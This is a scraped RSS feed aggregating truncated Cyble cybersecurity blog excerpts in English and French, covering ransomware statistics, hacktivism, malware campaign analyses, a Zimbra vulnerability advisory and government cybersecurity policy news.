This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-10T20:55:01+00:00 www.secnews.physaphae.fr Cyble - CyberSecurity Firm Global ransomware attacks in April 2025 declined to 450 from 564 in March – the lowest level since November 2024 – as major changes among the leading Ransomware-as-a-Service (RaaS) groups caused many affiliates to align with new groups. Still, the long-term trend for ransomware attacks remains decidedly upward (chart below) so April\'s decline could be reversed as soon as new RaaS leaders are established.  ~ Rasomware attacks by month 2021-2025 For now, the uncertainty at RansomHub – which went offline at the start of April but plans to return – resulted in new groups taking over the top global attack spots. Qilin, which gained affiliates from the RansomHub uncertainty, led all groups with 74 attacks claimed in April (chart below), followed by Akira at 70, Play with 50, Lynx with 31 attacks, and NightSpire at 24. ]]> 2025-05-06T14:17:39+00:00 https://cyble.com/blog/qilin-tops-april-2025-ransomware-report/ www.secnews.physaphae.fr/article.php?IdArticle=8672355 False Ransomware,Malware,Vulnerability,Threat,Industrial,Prediction,Medical,Cloud,Technical None 2.0000000000000000 Cyble - CyberSecurity Firm Présentation Selon un nouveau rapport Cyble, les hacktivistes vont de plus en plus au-delà des activités traditionnelles telles que les attaques DDOS et les défaillances de sites Web en infrastructure critique plus sophistiquée et attaques de ransomwares. Dans un rapport pour les clients, Cyble a déclaré que le hacktivisme s'est «transformé en un instrument complexe de guerre hybride» avec la montée en puissance des groupes qui ont adopté des techniques d'attaque plus sophistiquées plus généralement associées aux acteurs de l'État-nation et aux groupes de menaces motivés financièrement. Hacktivism "ne se limite plus aux explosions idéologiques marginales", selon le rapport. «Il s'agit maintenant d'un appareil de cyber-insurrection décentralisé, capable de façonner les récits géopolitiques, de déstabiliser les systèmes critiques et de s'engager directement dans des conflits mondiaux à travers le domaine numérique.» Le rapport CYBLE a examiné les groupes hacktiviste les plus actifs au premier trimestre de 2025, les nations et les secteurs les plus ciblés, les techniques d'attaque émergentes, et plus encore. Les groupes hacktiviste les plus actifs ciblent l'infrastructure critique Les hacktivistes pro-russes étaient les plus actifs au premier trimestre, dirigés par NONAME057 (16), Hacktivist Sandworm]]> 2025-04-15T08:22:39+00:00 https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/ www.secnews.physaphae.fr/article.php?IdArticle=8662999 False Ransomware,Tool,Vulnerability,Threat,Legislation,Industrial,Prediction,Cloud,Technical APT 44 3.0000000000000000 Cyble - CyberSecurity Firm Key Takeaways This attack leverages a ZIP file with a deceptive LNK shortcut to silently execute a multi-stage PowerShell-based infection chain, ensuring stealthy deployment. A vulnerable driver (CVE-2015-2291) is exploited through a Bring Your Own Vulnerable Driver (BYOVD) technique to gain kernel-level read/write access for privilege escalation. The payload is a customized version of Fog ransomware, branded as "DOGE BIG BALLS Ransomware," reflecting an attempt to add psychological manipulation and misattribution. Ransomware scripts include provocative political commentary and the use of a real individual\'s name and address, indicating intent to confuse, intimidate, or mislead victims. The malware uses router MAC addresses (BSSIDs) and queries the Wigle.net API to determine the victim\'s physical location-offering more accurate geolocation than IP-based methods. Extensive system and network information, including hardware IDs, firewall states, network configuration, and running processes, is collected via PowerShell, aiding attacker profiling. Embedded within the toolkit is a Havoc C2 beacon, hinting at the threat actor\'s (TA\'s) potential to maintain long-term access or conduct additional post-encryption activities. Overview: A recent ransomware operation has revealed a blend of technical sophistication and psychological manipulation, setting it apart from conventional attacks. Disguised under a finance-themed ZIP file, the campaign employs deceptive shortcut files and multi-stage PowerShell scripts to deliver custom payloads, including a kernel-mode exploit tool and reconnaissance modules. This layered approach allows attackers to gat]]> 2025-04-14T12:58:44+00:00 https://cyble.com/blog/doge-big-balls-ransomware-edward-coristine/ www.secnews.physaphae.fr/article.php?IdArticle=8662673 False Ransomware,Spam,Malware,Tool,Threat,Cloud,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Social Engineering Campagne contre les développeurs de dissociation en déguisé malin github . À l'aide d'un faux test de recrutement nommé " FizzBuzz ", le TA tourne les victimes de télécharger un fichier ISO contenant un apparemment inoffensif javascript Exercice et un LNK malivet shortcut]]> 2025-03-24T11:09:37+00:00 https://cyble.com/blog/fake-coding-challenges-steal-sensitive-data-via-fogdoor/ www.secnews.physaphae.fr/article.php?IdArticle=8657753 False Malware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Zimbra Collaboration Suite (ZCS) is a widely used email and collaboration platform. Security remains a top priority for administrators and users who rely on Zimbra for business communication. Recently, Zimbra has addressed several critical security issues, including stored cross-site scripting (XSS), SQL injection (SQLi), and server-side request forgery (SSRF). This article provides a detailed technical breakdown of these vulnerabilities, their potential impact, and recommended actions. Below is an in-depth analysis of these vulnerabilities. 1. Stored Cross-Site Scripting (XSS) - CVE-2025-27915 Affected Versions: ZCS 9.0, 10.0, and 10.1 (before patches 44, 10.0.13, and 10.1.5) Patch Availability: Fixed in the latest patches Description: This vulnerability resides in the Classic Web Client due to insufficient sanitization of HTML content in ICS calendar invite files. Attackers can embed malicious JavaScript inside an ICS file, which executes when a victim opens an email containing the ICS entry. Exploitation allows unauthorized actions within the victim\'s session, such as modifying email filters to redirect messages to an attacker\'s inbox. ]]> 2025-03-18T13:50:51+00:00 https://cyble.com/blog/breaking-down-zimbras-latest-security-threats/ www.secnews.physaphae.fr/article.php?IdArticle=8656463 False Vulnerability,Industrial,Technical None 2.0000000000000000 Cyble - CyberSecurity Firm 2025-03-10T12:10:47+00:00 https://cyble.com/blog/three-vmware-zero-days-under-active-exploitation/ www.secnews.physaphae.fr/article.php?IdArticle=8654866 False Vulnerability,Threat,Patching,Cloud,Technical None 2.0000000000000000 Cyble - CyberSecurity Firm BSI Expands Cybersecurity Cooperation with Hamburg  Germany continues to strengthen its cybersecurity framework as the Federal Office for Information Security (BSI) and the Free and Hanseatic City of Hamburg formalize their collaboration. The agreement, signed on February 7, at Hamburg City Hall, establishes a structured approach to cyber threat intelligence sharing, incident response coordination, and awareness initiatives for public sector employees.  BSI Vice President Dr. Gerhard Schabhüser called for the urgency of strengthening cybersecurity across federal and state levels:  “In view of the worrying threat situation in cyberspace, Germany must become a cyber nation. State administrations and municipal institutions face cyberattacks daily. Attacks on critical infrastructure threaten social order. Germany is a target of cyber sabotage and espionage. Our goal is to enhance cybersecurity nationwide. To achieve this, we must collaborate at both federal and state levels.”  This partnership is part of a broader federal initiative, with BSI having previously signed cooperation agreements with Saxony, Saxony-Anhalt, Lower Saxony, Hesse, Bremen, Rhineland-Palatinate, and Saarland. These agreements provide a constitutional framework for joint cyber defense efforts, strategic advisory services, and rapid response measures following cyber incidents.  With cyber threats growing in complexity, state-level cooperation plays a vital role in reinforcing Germany\'s cybersecurity resilience, ensuring government agencies, public sector institutions, and critical infrastructure operators have the necessary tools and expertise to prevent, detect, and mitigate cyber threats effectively.  Addressing Digital Violence  Days later, on February 11, BSI hosted “BSI in Dialogue: Cybersecurity and Digital Violence” in Berlin, bringing together representatives from politics, industry, academia, and civil society to address the growing risks associated with digital violence in an increasingly interconnected world.  While cybercriminals typically operate remotely, digital violence introduces a new layer of cyber threats, where attackers exploit personal relationships, home technologies, and social connections to manipulate, monitor, or harm individuals. This includes:  Unauthorized access to smart home device]]> 2025-02-14T12:07:49+00:00 https://cyble.com/blog/germany-strengthening-cybersecurity/ www.secnews.physaphae.fr/article.php?IdArticle=8648472 False Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The 2023/24 Cyber Threat Report from New Zealand\'s National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country\'s rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats. For the year ending June 2024, the NCSC recorded a whopping total of 7,122 cybersecurity incidents, marking a new milestone since CERT NZ\'s integration into the NCSC. Of these incidents, 95% (6,799) were handled through the NCSC\'s general triage process. These incidents primarily affected small to medium businesses and individual users and resulted in a reported financial loss of $21.6 million. While these incidents did not require specialized technical interventions, they still had a substantial impact on those affected, particularly in terms of financial losses and reputational damage. A smaller subset of incidents, 343 in total, was categorized as having national significance. These incidents were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, signaling a slight increase in cyber activities from such groups. Financially motivated cybercriminal activities were responsible for 65 of these high-impact incidents, emphasizing the persistent threat from financially driven attacks such as ransomware and data exfiltration. 2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware ]]> 2025-02-12T10:33:38+00:00 https://cyble.com/blog/ncsc-reports-surge-in-cyber-threats-and-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648178 False Ransomware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview In a highly anticipated trial on February 7, 2025, Rowland Turaki, a former employee of the accused, Xiao Hong Will, a Chinese national, took the stand as the first prosecution witness in the ongoing case concerning alleged cyber terrorism and internet fraud. The trial, which is being heard at the Federal High Court in Ikoyi, Lagos, is centered on Xiao Hong Will and his company, Genting International Co. Limited, both facing serious charges related to cybercrimes, identity theft, and fraud. The witness, who was studying cybersecurity at the time, described in vivid detail how his employers instructed him to disguise himself as a woman to gain the trust of potential clients for fraudulent schemes. According to Turaki, he was employed by Genting International, a company allegedly linked to a network of cybercriminals engaged in elaborate internet fraud operations. The company is accused of using deceptive tactics, including employing Nigerian youths for identity theft and cyber-terrorism activities aimed at destabilizing Nigeria\'s constitutional structure. The Arrest of Xiao Hong Will Xiao Hong Will, arrested during the EFCC\'s "Eagle Flush Operation" in Lagos on December 19, 2024, is charged with a series of crimes under the Cybercrimes (Prohibition, Prevention, Etc.) Act, 2015 (As Amended, 2024). He and his company allegedly facilitated the exploitation of victims by using fraudulent identities and cryptocurrency schemes to gain financial advantage. The prosecution has charged Hong Will and Genting International with using Nigerian youths to create fake personas, potential]]> 2025-02-11T11:23:25+00:00 https://cyble.com/blog/efcc-witness-details-cyber-terrorism/ www.secnews.physaphae.fr/article.php?IdArticle=8648026 False Threat,Legislation,Medical,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. “In the face of a relentless wave of intrusions involving network devices globally our new guidance sets what we collectively see as the standard required to meet the contemporary threat,” said NCSC Technical Director Ollie Whitehouse. “In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities require post intrusion.” Understanding Edge Device Security Risks Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintai]]> 2025-02-06T10:44:52+00:00 https://cyble.com/blog/new-security-guidelines-edge-device-manufacturers/ www.secnews.physaphae.fr/article.php?IdArticle=8647186 False Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The digital world in Southeast Asia is evolving rapidly, with nations striving to balance innovation, inclusivity, and security. The recently held 5th ASEAN Digital Ministers\' Meeting (ADGMIN) in Bangkok, Thailand, marked a significant milestone in this journey. The meeting highlighted the importance of cybersecurity in shaping a resilient digital future for the region. The ASEAN Digital Masterplan 2025 (ADM 2025) continues to serve as a guiding framework for fostering collaboration, enabling trust in digital services, and promoting the safe and inclusive use of technology. From addressing online scams to operationalizing the ASEAN Regional Computer Emergency Response Team (CERT) and advancing AI governance, the event showcased ASEAN\'s commitment to fortifying its digital ecosystem against cyber threats. With an emphasis on collaboration and proactive measures, the meeting highlighted the pressing need to enhance cybersecurity frameworks, strengthen cross-border data governance, and address emerging challenges posed by technologies like generative AI. Key Cybersecurity Highlights ASEAN Regional CERT Operationalization: One of the significant milestones discussed was the operationalization of the ASEAN Regional Computer Emergency Response Team (CERT). This initiative aims to enhance collaboration among member states, facilitate real-time information sharing, and strengthen the region\'s preparedness against cyberattacks. CERT\'s operationalization highlights ASEAN\'s focus on collective resilience in cyberspace. Tackling Online Scams: Online scams remain a pressing issue across ASEAN. The ASEAN Working Group on Anti-Online Scams (WG-AS) released its Report on Online Scams Activities in ASEAN (2023–2024), offering insights into the threat landscape. The report outlines key recommendations for regional collaboration to combat scams effectively. The ASEAN Recommendations on Anti-Online Scams provide a framework for governments to develop policies aimed at mitigating online fraud, with a focus on cross-border scams and fraudulent activities exploiting digital platforms. Promoting Responsible State Behavior in Cyberspace: ASEAN adopted the Checklist for Responsible State Behavior in Cyberspace, aligning with global norms to promote peace and security online. This initiative focuses on fostering cooperation and ensuring responsible use of digital tools while mitigating risks. Strengthening Cross-Border Data Governance: Data governance was another key topi]]> 2025-01-27T12:16:17+00:00 https://cyble.com/blog/united-against-cybercrime-asean-ministers-forge-new-security-pathways/ www.secnews.physaphae.fr/article.php?IdArticle=8643314 False Ransomware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  The Cybersecurity and Infrastructure Security Agency (CISA) has introduced Vulnrichment, an innovative initiative designed to enhance CVE data by adding crucial context, scoring, and detailed analysis. Launched on May 10, 2024, Vulnrichment aims to empower security professionals by providing more than just basic CVE information-it offers the insights needed to make informed, timely decisions regarding vulnerability management.   As part of a mid-year update, CISA\'s Tod Beardsley, Vulnerability Response Section Chief, provides an overview of how this resource can be leveraged to improve vulnerability management.  For IT defenders and vulnerability management teams, Vulnrichment represents a significant advancement in how CVE data is presented and utilized. By enriching basic CVE records with essential metadata like Stakeholder-Specific Vulnerability Categorization (SSVC) decision points, Common Weakness Enumeration (CWE) IDs, and Common Vulnerability Scoring System (CVSS) scores, Vulnrichment transforms raw CVE data into a more actionable and comprehensive resource.  The best part? No additional setup is required. This enhanced data is integrated directly into the CVE feeds already being consumed by security teams. Whether you\'re pulling CVE data from the official CISA platform at https://cve.org or GitHub at https://github.com/CVEProject/cvelistV5, you\'re already collecting the enriched CVE records that Vulnrichment provides.  How Vulnrichment Enhances CVE Data  CISA\'s Vulnrichment is designed to provide a deeper layer of insight into each CVE, helping security professionals prioritize vulnerabilities with greater clarity. Here\'s an example of how Vulnrichment works with a specific CVE, CVE-2023-45727, which has been marked as a Known Exploited Vulnerability (KEV) by CISA. If you want to understand the exploitation status of this CVE, you can query the SSVC decision points included in the Vulnrichment ADP (Authorized Data Publisher) container. For instance, using the command line tool jq, you can execute a query to extract the "Exploitation" field to understand whether the vulnerability is actively being exploited, requires proof of concept, or is not yet exploited in the wild.  By parsing the ADP container, you can extract this enriched data, which helps you make informed decisions about whether to prioritize this vulnerability over others. This ability to access context-rich CVE data provides valuable intelligence for vulnerability management efforts, enabling teams to prioriti]]> 2025-01-24T14:40:40+00:00 https://cyble.com/blog/cisa-reveals-vulnrichment-management-for-cve-data/ www.secnews.physaphae.fr/article.php?IdArticle=8642102 False Tool,Vulnerability,Threat,Patching,Technical None 3.0000000000000000